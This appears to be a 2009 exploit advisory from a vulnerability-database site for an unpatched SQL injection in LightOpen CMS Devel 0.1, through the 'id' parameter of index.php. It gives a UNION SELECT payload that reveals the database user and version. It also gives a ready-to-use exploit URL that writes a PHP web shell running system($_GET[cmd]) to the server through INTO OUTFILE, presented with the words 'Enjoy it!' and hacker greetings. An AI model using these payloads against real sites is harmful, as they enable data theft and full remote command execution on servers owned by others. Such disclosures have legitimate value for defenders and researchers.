LightOpen CMS Devel 0.1 dev Sql Injection

2009.06.05
Credit: y3nh4ck3r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

--------------------------------------------------------- SQL INJECTION VULNERABILITY--LightOpen CMS Devel 0.1--> --------------------------------------------------------- CMS INFORMATION: -->WEB: http://sourceforge.net/projects/lightopencms/ -->DOWNLOAD: http://sourceforge.net/projects/lightopencms/ -->DEMO: N/A -->CATEGORY: CMS / Portal -->DESCRIPTION: LightOpenCMS is a new CMS that in difference from other CMS softwares have the CMS and the CMS admin in different packages... -->RELEASED: 2009-05-15 CMS VULNERABILITY: -->TESTED ON: firefox 3 -->DORK: N/A -->CATEGORY: SQL INJECTION -->AFFECT VERSION: CURRENT -->Discovered Bug date: 2009-06-02 -->Reported Bug date: 2009-06-02 -->Fixed bug date: Not fixed -->Info patch: Not fixed -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) ######################### //////////////////////// SQL INJECTION (SQLi): //////////////////////// ######################### <<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>> ------------------- PROOFS OF CONCEPT: ------------------- [++] GET var --> 'id' [++] File vuln --> 'index.php' ~~~~~> http://[HOST]/[PATH]/index.php?id=1%27+UNION+ALL+SELECT+1,user(),version(),4%23 [++[Return]++] ~~~~~> User and version in DB. ---------- EXPLOITS: ---------- <<<<---------++++++++++++++ Condition: Permission to create files +++++++++++++++++--------->>>> ~~~~~> http://[HOST]/[PATH]/index.php?id=1%27+UNION+ALL+SELECT+'<HTML><title>LightOpen CMS 0.1 pre-alpha--SHELL BY --Y3NH4CK3R--></title><body text=ffffff bgcolor=000000><center>','<h1>YOUR SHELL IS ON!<br></h1></center><br><br>','<font color=ff0000><h2>Get var (cmd) to execute comands. Enjoy it!</h2></font><h3>Command Result:</h3><?php system($_GET[cmd]); ?>','<br><br><font color=ff0000><h3>By y3nh4ck3r. Contact: y3nh4ck3r_at_gmail.com</h3></font></body></HTML>'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'%23 [++[Return]++] ~~~~~> Your shell in --> http://[HOST]/[PATH]/shell.php. ##*******************************************************************## ## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ## ##*******************************************************************## ##-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: SPANISH H4ck3Rs community! ## ##*******************************************************************##

References:

http://seclists.org/bugtraq/2009/Jun/0055.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top